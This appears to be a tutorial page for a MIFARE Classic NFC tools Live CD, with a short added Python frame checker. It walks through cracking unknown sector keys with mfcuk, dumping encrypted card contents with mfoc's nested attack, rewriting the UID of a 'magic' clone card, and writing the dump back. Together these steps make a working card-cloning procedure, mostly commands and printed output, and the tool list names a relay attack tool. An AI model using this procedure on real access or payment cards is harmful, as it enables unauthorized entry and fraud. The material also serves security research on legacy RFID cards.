Restore Dump File Back to Card

ubuntu@ubuntu:~$ sudo nfc-mfclassic -h

Output:

Usage: nfc-mfclassic r|R|w|W a|b <dump.mfd> [<keys.mfd> [f]]
r|R|w|W - Perform read from (r) or unlocked read from (R) or write to (w) or unlocked write to (W) card
*** note that unlocked write will attempt to overwrite block 0 including UID
*** unlocked read does not require authentication and will reveal A and B keys
*** unlocking only works with special Mifare 1K cards (Chinese clones)
a|A|b|B - Use A or B keys for action; Halt on errors (a|b) or tolerate errors (A|B)
<dump.mfd> - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
<keys.mfd> - MiFare Dump (MFD) that contain the keys (optional)
f - Force using the keyfile even if UID does not match (optional)

ubuntu@ubuntu:~$ sudo nfc-mfclassic W A cardtocopy.dmp

Output:

NFC reader: SCM Micro / SCL3711-NFC&RW opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID (NFCID1): 01 23 45 67
SAK (SEL_RES): 08
Guessing size: seems to be a 1024-byte card
Sent bits: 50 00 57 cd
Sent bits: 40 (7 bits)
Received bits: a (4 bits)
Sent bits: 43
Received bits: 0a
Writing 64 blocks |................................................................|
Done, 64 of 64 blocks written.

Recover keys and dump content into file

MFCUK – MiFare Classic Universal toolKit.

MFCUK recovers a key without knowing any key beforehand. Recovering one key took from a few minutes to a couple of tens of minutes.

ubuntu@ubuntu:~$ sudo mfcuk -C -R 0:A -v 2

INFO: block 3 recovered KEY: 8c9c83f6d192

ubuntu@ubuntu:~$ sudo mfcuk -C -R 0:B -v 2

INFO: block 3 recovered KEY: f4a9ef2afc6d

Sometimes we get a recoverable error like the one below, but the decryption process still works fine.
RECOVER: 0mfcuk: ERROR: mfcuk_key_recovery_block() (error code=0x03)

MFOC is an open source implementation of the “offline nested” attack by Nethemba.

If a card uses at least one block encrypted with a default key, all the other keys can be extracted in minutes. If the card does not use default keys, one key for a sector can be retrieved using the MFCUK library, after which this library can be used.

Using the keys for a sector that were retrieved with the MFCUK library:

sudo mfoc -k 8c9c83f6d192 -k f4a9ef2afc6d -P 500 -O cardtocopy.dmp

Output:

The custom key 0x8c9c83f6d192 has been added to the default keys
The custom key 0xf4a9ef2afc6d has been added to the default keys
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 2a e9 0e 52
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
...

The content of the encrypted card is dumped into “cardtocopy.dmp”.

Format Mifare Magic Card

ubuntu@ubuntu:~$ sudo nfc-mfsetuid -h

Output:

Usage: nfc-mfsetuid [OPTIONS] [UID]
Options:
-h Help. Print this message.
-f Format. Delete all data (set to 0xFF) and reset ACLs to default.
-q Quiet mode. Suppress output of READER and CARD data (improves timing).

Specify UID (4 HEX bytes) to set UID, or leave blank for default '01234567'.
This utility can be used to recover cards that have been damaged by writing bad
data (e.g. wrong BCC), thus making them non-selectable by most tools/readers.

*** Note: this utility only works with special Mifare 1K cards (Chinese clones).

ubuntu@ubuntu:~$ sudo nfc-mfsetuid -f

Output:

NFC reader: SCM Micro / SCL3711-NFC&RW opened
Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 01 23 45 67 00
Sent bits: 93 70 01 23 45 67 00 d0 6f
Received bits: 08 b6 dd

Found tag with
UID: 01234567
ATQA: 0004
SAK: 08

Sent bits: 50 00 57 cd
...

Confirm format is complete:

ubuntu@ubuntu:~$ sudo mfoc -P 500 -O blank-chinese.dmp

Output:

ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 01 23 45 67
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
...

Set UID on Mifare Magic Card

Get UID from Magic Card:

ubuntu@ubuntu:~$ sudo nfc-anticol

Output:

NFC reader: SCM Micro / SCL3711-NFC&RW opened

Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 00 dc 44 20 b8
Sent bits: 93 70 00 dc 44 20 b8 37 c9
Received bits: 08 b6 dd
Sent bits: 50 00 57 cd

Found tag with
UID: 00dc4420
ATQA: 0004
SAK: 08

Set UID on Magic Card:

ubuntu@ubuntu:~$ sudo nfc-mfsetuid 2ae90e52

Output:

NFC reader: SCM Micro / SCL3711-NFC&RW opened
Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 00 dc 44 20 b8
Sent bits: 93 70 00 dc 44 20 b8 37 c9
Received bits: 08 b6 dd

Found tag with
UID: 00dc4420
ATQA: 0004
SAK: 08

Sent bits: 50 00 57 cd
Sent bits: 40 (7 bits)
Received bits: a (4 bits)
Sent bits: 43
Received bits: 0a
Sent bits: a0 00 5f b1
Received bits: 0a
Sent bits: 2a e9 0e 52 9f 08 04 00 46 59 25 58 49 10 23 02 11 ef
Received bits: 0a

Get UID from Magic Card:

ubuntu@ubuntu:~$ sudo nfc-anticol

Output:

NFC reader: SCM Micro / SCL3711-NFC&RW opened

Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 2a e9 0e 52 9f
Sent bits: 93 70 2a e9 0e 52 9f 6e 24
Received bits: 08 b6 dd
Sent bits: 50 00 57 cd

Found tag with
UID: 2ae90e52
ATQA: 0004
SAK: 08
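
Added example (not part of the original page or of libnfc): the "Sent bits" / "Received bits" lines printed above can be checked offline. The script recomputes the BCC of the anticollision reply and the ISO/IEC 14443-A CRC on every frame that carries one, and flags the 4-bit acknowledgement to the 7-bit 40 command, the unlock that only the special cards accept. The names crc_a, parse and check are made up for this example.

```python
import re
# Constructed sample: frames copied from the "nfc-mfsetuid 2ae90e52" output above.
TRACE = """\
Sent bits: 93 20
Received bits: 00 dc 44 20 b8
Sent bits: 93 70 00 dc 44 20 b8 37 c9
Received bits: 08 b6 dd
Sent bits: 50 00 57 cd
Sent bits: 40 (7 bits)
Received bits: a (4 bits)
Sent bits: 43
Received bits: 0a
Sent bits: a0 00 5f b1
Received bits: 0a
Sent bits: 2a e9 0e 52 9f 08 04 00 46 59 25 58 49 10 23 02 11 ef
"""
LINE = re.compile(r"^(Sent|Received) bits:\s*([0-9a-f ]+?)\s*(?:\((\d+) bits\))?\s*$")

def crc_a(data: bytes) -> bytes:
    """ISO/IEC 14443-3 Type A CRC: preset 0x6363, appended low byte first."""
    crc = 0x6363
    for b in data:
        b ^= crc & 0xFF
        b ^= (b << 4) & 0xFF
        crc = (crc >> 8) ^ (b << 8) ^ (b << 3) ^ (b >> 4)
    return bytes([crc & 0xFF, crc >> 8])

def parse(trace: str):
    """Return (direction, payload, bit_count) for every Sent/Received line."""
    frames = []
    for line in trace.splitlines():
        m = LINE.match(line.strip())
        if m:
            data = bytes(int(x, 16) for x in m.group(2).split())
            frames.append((m.group(1), data, int(m.group(3) or 8 * len(data))))
    return frames

def check(frames):
    """Verify BCC on anticollision replies and CRC_A on frames that carry one."""
    findings = []
    for i, (side, d, bits) in enumerate(frames):
        prev = frames[i - 1][1] if i else b""
        if side == "Received" and prev == b"\x93\x20" and len(d) == 5:
            # Reply to anticollision (93 20): 4 UID bytes followed by BCC = XOR of them
            findings.append(("bcc", d[:4].hex(), d[0] ^ d[1] ^ d[2] ^ d[3] == d[4]))
        elif side == "Received" and prev == b"\x40" and bits == 4:
            findings.append(("magic-unlock-ack", d.hex(), d == b"\x0a"))
        elif len(d) >= 3:  # SELECT, SAK, HLTA, WRITE and block data end in CRC_A
            findings.append(("crc_a", d[:-2].hex(), crc_a(d[:-2]) == d[-2:]))
    return findings
```

Calling check(parse(TRACE)) returns one tuple per verified frame; a False in the last position marks a frame whose BCC or CRC does not match, which is the "wrong BCC" damage that the nfc-mfsetuid help text mentions.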

Software Included in the Mifare Live CD

nfc-anticol - Demonstration of NFC anti-collision tool
nfc-dep-initiator - send/received data as D.E.P. initiator
nfc-dep-target - send/received data as D.E.P. target
nfc-emulate-forum-tag2 - NFC Forum tag type 2 emulation
nfc-emulate-forum-tag4 - NFC Forum tag type 4 emulation
nfc-emulate-tag - Simple tag emulation command line
nfc-emulate-uid - NFC target emulation command line
nfc-list - list NFC targets
nfc-mfclassic - MIFARE Classic command line tool
nfc-mfsetuid - M1 special card UID setting and recovery
nfc-mfultralight - MIFARE Ultralight command line tool
nfc-poll - poll first available NFC target
nfc-read-forum-tag3 - Extract NDEF Tag Type 3
nfc-relay - Relay attack command line tool
nfc-relay-picc - Relay for ISO14443-4
nfc-scan-device - Scan NFC devices

Some USB/NFC helper applications

Find USB device details in Linux using the lsusb command

As Linux users we should know the USB bus details as well as the devices connected to it. Here we will see how to use the lsusb command to display different USB properties.

Example 1: List all the USB ports available

ubuntu@ubuntu:~$ sudo lsusb

Output:


Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 005 Device 002: ID 04e6:5591 SCM Microsystems, Inc.
Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 002 Device 002: ID 13ee:0001 MosArt
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

“04e6:5591 SCM Microsystems, Inc.” means the SCM reader is correctly connected.

Use nfc-list to find out if the NFC driver is correctly installed.

ubuntu@ubuntu:~$ sudo nfc-list

Output:


nfc-list uses libnfc 1.7.0
NFC device: SCM Micro / SCL3711-NFC&RW opened

Magic Mifare Classic 1k Cards

UID Changeable Mifare Classic 1k Compatible Card:

  1. Block 0 of the card (the UID block) can be modified arbitrarily.
  2. Block 0 can be modified directly with a normal Mifare read-write device; no special equipment is needed.
  3. The card's default password is twelve F's: FFFFFFFFFFFF.

This card works the same as normal Mifare Classic 1K 13.56 MHz cards and follows the Mifare 1K S50 standard. The difference is that Sector 0 Block 0, known as the Serial Number/Manufacturer Block (chip UID), can be programmed from the Live CD to any UID you want.

Download NFC-Tools Live CD.

SCM SCL3711

NFC-Tools Devices compatibility matrix

NFC-Tools recommended Reader

Some users ask which device they should buy to use with libnfc.
Depending on what kind of device you are looking for, we recommend these devices: at the moment there is no good flat reader for desktop computers (there is the ASK LoGO, but it cannot act as a target); there is, however, a good dongle, so we recommend the SCM SCL3711.

SCM Microsystems SCL3711 User Manual

SCM Microsystems SCL3711 Reference Manual – version 1.6